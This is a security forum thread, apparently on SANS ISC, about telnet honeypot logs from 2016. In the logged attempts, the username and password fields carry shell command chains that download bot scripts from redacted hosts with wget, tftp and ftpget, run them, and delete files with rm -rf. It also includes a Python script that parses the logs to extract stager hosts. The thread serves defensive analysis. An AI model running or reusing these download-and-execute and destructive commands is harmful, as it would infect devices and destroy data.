Starting last night (Aug 23) I've seen a brand new style of attacks against my telnet honeypots. It appears that they are sending commands as the username and/or the password. I assume there's some new vulnerability where somebody's telnetd will actually run these commands. Anybody have a clue? Sample logs follow:

2016-08-23T22:22:43.301154-04:00 erhp2 ptelnetd[539]: IP: ###.#.137.70 TelnetLog: Username: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://##.###.2.94/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp ##.##.2.94 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g ##.###.2.94; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ##.###.2.94 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * Password: �

2016-08-24T02:32:58.166913-04:00 erhp2 ptelnetd[3966]: IP: ##.##.121.102 TelnetLog: Username: sh Password: cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://##.##.172.238/bin.sh;sh bin.sh;busybox tftp -r bin2.sh -g ##.##.172.238;sh bin2.sh;busybox tftp ##.##.172.238 -c get bin3.sh;sh bin3.sh;busybox ftpget ##.##.172.238 bin4.sh bin4.sh;sh bin4.sh;exit

Ericw
EricWedaa, 4 Posts
Aug 24th 2016
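One way to triage lines like the two above, as an added example that is not code from the post, from ptelnetd or from any honeypot project: it parses the ptelnetd log format quoted in the post, flags any Username or Password field that is a chained shell command rather than a credential, and pulls out the stager hosts and script names the chain tries to fetch via wget, tftp (both spellings seen in the logs) and busybox ftpget. The sample lines are constructed from the post's redacted logs (the `##`-style placeholders are kept as opaque tokens) plus one invented plain dictionary attempt for contrast; the regexes, function names and the "separator plus known tool" heuristic are my own assumptions.

```python
"""Flag telnet honeypot logins whose username/password field is a shell
command chain, and extract the download hosts/scripts it references.

Added example for this thread, not code from the original post or from any
honeypot project. Sample lines are constructed: the first two follow the
post's redacted ptelnetd logs, the third is an invented plain login attempt.
"""
import re

SAMPLE_LOG = (
    "2016-08-23T22:22:43.301154-04:00 erhp2 ptelnetd[539]: IP: ###.#.137.70 "
    "TelnetLog: Username: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; "
    "wget http://##.###.2.94/bins.sh; chmod 777 bins.sh; sh bins.sh; "
    "tftp ##.##.2.94 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; "
    "tftp -r tftp2.sh -g ##.###.2.94; chmod 777 tftp2.sh; sh tftp2.sh; "
    "ftpget -v -u anonymous -p anonymous -P 21 ##.###.2.94 ftp1.sh ftp1.sh; "
    "sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * "
    "Password: \x01\n"          # non-printable password byte, stands in for the post's garbled one
    "2016-08-24T02:32:58.166913-04:00 erhp2 ptelnetd[3966]: IP: ##.##.121.102 "
    "TelnetLog: Username: sh Password: cd /tmp || cd /var/run || cd /dev/shm || "
    "cd /mnt || cd /var;rm -f *;busybox wget http://##.##.172.238/bin.sh;sh bin.sh;"
    "busybox tftp -r bin2.sh -g ##.##.172.238;sh bin2.sh;"
    "busybox tftp ##.##.172.238 -c get bin3.sh;sh bin3.sh;"
    "busybox ftpget ##.##.172.238 bin4.sh bin4.sh;sh bin4.sh;exit\n"
    "2016-08-24T03:10:00.000000-04:00 erhp2 ptelnetd[4001]: IP: 10.0.0.5 "
    "TelnetLog: Username: root Password: xc3511\n"   # constructed ordinary brute-force attempt
)

# Log line layout as quoted in the post. IP is taken as an opaque token so the
# redacted ##-placeholders parse; the username is non-greedy up to " Password: ".
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) (?P<proc>\S+): IP: (?P<ip>\S+) TelnetLog: "
    r"Username: (?P<user>.*?) Password: (?P<pw>.*)$"
)
SEP_RE = re.compile(r";|\|\||&&")                    # shell command separators
TOOL_RE = re.compile(r"\b(wget|tftp|ftpget|busybox|chmod|sh|rm|cd)\b")


def is_command(field: str) -> bool:
    """Heuristic: a credential that chains commands with ; || && and names a
    shell or download tool is an injection attempt, not a login guess."""
    return bool(SEP_RE.search(field)) and bool(TOOL_RE.search(field))


def _host_of(url: str) -> str:
    return re.sub(r"^\w+://", "", url).split("/")[0]


def extract_stagers(field: str):
    """Return (tool, host, script) for each wget/tftp/ftpget in the chain.
    Handles 'tftp HOST -c get FILE', 'tftp -r FILE -g HOST' and busybox
    ftpget's '[-v] [-u U] [-p P] [-P PORT] HOST LOCAL [REMOTE]' forms."""
    found = []
    for cmd in SEP_RE.split(field):
        argv = cmd.split()
        if argv and argv[0] == "busybox":           # 'busybox wget ...' == 'wget ...'
            argv = argv[1:]
        if not argv:
            continue
        tool = argv[0]
        try:
            if tool == "wget":
                url = next(a for a in argv[1:] if not a.startswith("-"))
                found.append((tool, _host_of(url), url.rsplit("/", 1)[-1]))
            elif tool == "tftp" and "-r" in argv:
                found.append((tool, argv[argv.index("-g") + 1], argv[argv.index("-r") + 1]))
            elif tool == "tftp" and "-c" in argv:
                found.append((tool, argv[1], argv[argv.index("-c") + 2]))   # '-c get FILE'
            elif tool == "ftpget":
                pos, i = [], 1
                while i < len(argv):
                    if argv[i] in ("-u", "-p", "-P"):   # options that take a value
                        i += 2
                    elif argv[i].startswith("-"):       # bare flags such as -v
                        i += 1
                    else:
                        pos.append(argv[i])
                        i += 1
                found.append((tool, pos[0], pos[-1]))
        except (StopIteration, ValueError, IndexError):
            continue   # truncated or malformed command: skip rather than crash the parser
    return found


def analyze(log_text: str):
    """Per matching log line: source IP, which field carried the chain (or None)
    and the stagers it references. Lines in another format are ignored."""
    results = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        injected = next((n for n in ("user", "pw") if is_command(m.group(n))), None)
        stagers = extract_stagers(m.group(injected)) if injected else []
        results.append({"ip": m.group("ip"), "field": injected,
                        "hosts": sorted({h for _, h, _ in stagers}),
                        "stagers": stagers})
    return results


if __name__ == "__main__":
    for r in analyze(SAMPLE_LOG):
        print(r)
```

The `is_command` check deliberately requires both a separator and a tool name, so a bare `sh` username (as in the second log line) is not flagged on its own; it is the password field of that line that carries the chain. Hosts are pulled out as opaque tokens, which is why the redacted `##` addresses survive the parse; on unredacted logs the same code yields real IPs you can block or feed to a sandbox.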
Hello Eric,

Could be a buggy bot script? The set of commands sent as username is coming from the classic Gafgyt malware… Could you share the IP addresses with me please?

KR,
Xme, 702 Posts, ISC Handler
Aug 24th 2016
I don't think so. That malware apparently tries a dictionary attack and if it succeeds THEN it sends commands. At least according to what little I could find. Do you have a decent writeup someplace?
EricWedaa, 4 Posts
Aug 24th 2016